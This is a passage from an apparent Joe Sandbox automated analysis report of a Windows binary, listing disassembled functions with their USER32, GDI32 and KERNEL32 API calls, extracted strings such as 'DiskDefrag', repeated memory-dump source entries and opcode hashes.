                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$RedrawWindow
                                                                                                                                                                                                                                                                                    • String ID: %s (%c:)$%s (%s)$3401034$3401126
                                                                                                                                                                                                                                                                                    • API String ID: 648961319-3732436656
                                                                                                                                                                                                                                                                                    • Opcode ID: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                    • Instruction ID: fd74af85edc4f78d52bbe53b36b76dc0b3b7e67d0ab5ffb778a9a62391dde0ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E718D716043409FD324DF64DD85FABBBF4EF88700F10492EFA5A96290DBB4A944CB5A
                                                                                                                                                                                                                                                                                    Function 00419AE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(00497F28), ref: 00419C49
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(00497F30), ref: 00419C54
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00419C70
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419C9C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PerformanceQuery$Counter$AddressFrequencyHandleModuleProcUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: NtQuerySystemInformation$ntdll
                                                                                                                                                                                                                                                                                    • API String ID: 3025674679-3593917365
                                                                                                                                                                                                                                                                                    • Opcode ID: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                    • Instruction ID: d06557f50192d5db3270ba6b6212bac26de826900838c4c68c4281c4e513f8d9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF518F71B1C301ABD7149F11FD55AAA37E4FB98780F108C3EE585A2268FB3499418BDD
                                                                                                                                                                                                                                                                                    Function 0042CAA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CAB6
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0042CAE7
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0042CB0D
                                                                                                                                                                                                                                                                                    • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB22
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0042CB35
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0042CB43
                                                                                                                                                                                                                                                                                    • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB58
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$NotifyParentVisibleWindow
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 2910063261-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: a16c229816da6b7cf5f0a28e1e2d3aecd927b3af40c0253dbdebf6034a51f9bf
                                                                                                                                                                                                                                                                                    • Instruction ID: cbd818397c052fadd252f380dd8efe1df66f27c17fa2dba641e1c387511c7e9b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a16c229816da6b7cf5f0a28e1e2d3aecd927b3af40c0253dbdebf6034a51f9bf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0511030764700ABE224EF31DDD6FEA7394BB50B04F90842EB25F9A1D19FA47944CB99
                                                                                                                                                                                                                                                                                    Function 00402760 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 004027B1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 00402863
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402041$3402042$DiskDefrag$Images$close$open
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3786962624
                                                                                                                                                                                                                                                                                    • Opcode ID: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                    • Instruction ID: 8150cbd10707325bb4a07bc8764e9056bc1ba0aa629cfab9f1adae748ae802a6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8319EB579020027D61576254EA6FBE21661FC4B48F25C22FB30E7B3C2DEED9C41429E
                                                                                                                                                                                                                                                                                    Function 004275D0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                    • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                    • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                    • Opcode ID: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                    • Instruction ID: 7aa1b3021184ad304fb6d47c852e9f0d985907e1382866191d812cb31a89d144
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 872179F0A50301BBD7106BB49C4AB9A31A8AF54701F50C82BB50EE1550D7BCA8449B6D
                                                                                                                                                                                                                                                                                    Function 00416B80 Relevance: 13.6, APIs: 9, Instructions: 118windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00416BBB
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00416BCF
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00416BDE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000198,00000000,?), ref: 00416BFF
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00416C10
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000198,?,?), ref: 00416C74
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 00416C87
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00416C98
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?), ref: 00416CC7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$MessageSend$Invalidate$ClientCursorScreen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2454936240-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 41846961993d4e238d2a253bad1eeefc775d047419a5e1f45b38c98fcc342d77
                                                                                                                                                                                                                                                                                    • Instruction ID: e3b87b86549111153a689a6de42a5e443b1792048b086b4c3e38e8d95830a062
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41846961993d4e238d2a253bad1eeefc775d047419a5e1f45b38c98fcc342d77
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3413BB1208301AFC310DF65D884EABB7E9FBC8710F004A2EF59987250E775E945CBA6
                                                                                                                                                                                                                                                                                    Function 004318A0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 294windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 004318DA
                                                                                                                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 004319AA
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00431B90
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431BCE
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00431BEF
                                                                                                                                                                                                                                                                                    • AlphaBlend.MSIMG32(?,?,?,?,00000003,?,00000000,00000000,?,00000003,00000000,00000000,00000000,?,?,00F0F0F0), ref: 00431C5D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateRect$AlphaBitmapBlendCopyFrameObjectSelect
                                                                                                                                                                                                                                                                                    • String ID: Z
                                                                                                                                                                                                                                                                                    • API String ID: 54210234-1505515367
                                                                                                                                                                                                                                                                                    • Opcode ID: 5f029b77f6b4eb3bbc3495fe3d68357bdf896ac53e414383373f8e8c30d0e72a
                                                                                                                                                                                                                                                                                    • Instruction ID: 0792d4e533d00b1b26a73fc7749f663e28f4755597dc11c0d4e9561af80c2fe6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f029b77f6b4eb3bbc3495fe3d68357bdf896ac53e414383373f8e8c30d0e72a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DC112716083418FC724DF69C984A5BBBE5AFC8704F108A2EF58987391DB74E909CB96
                                                                                                                                                                                                                                                                                    Function 00410D00 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
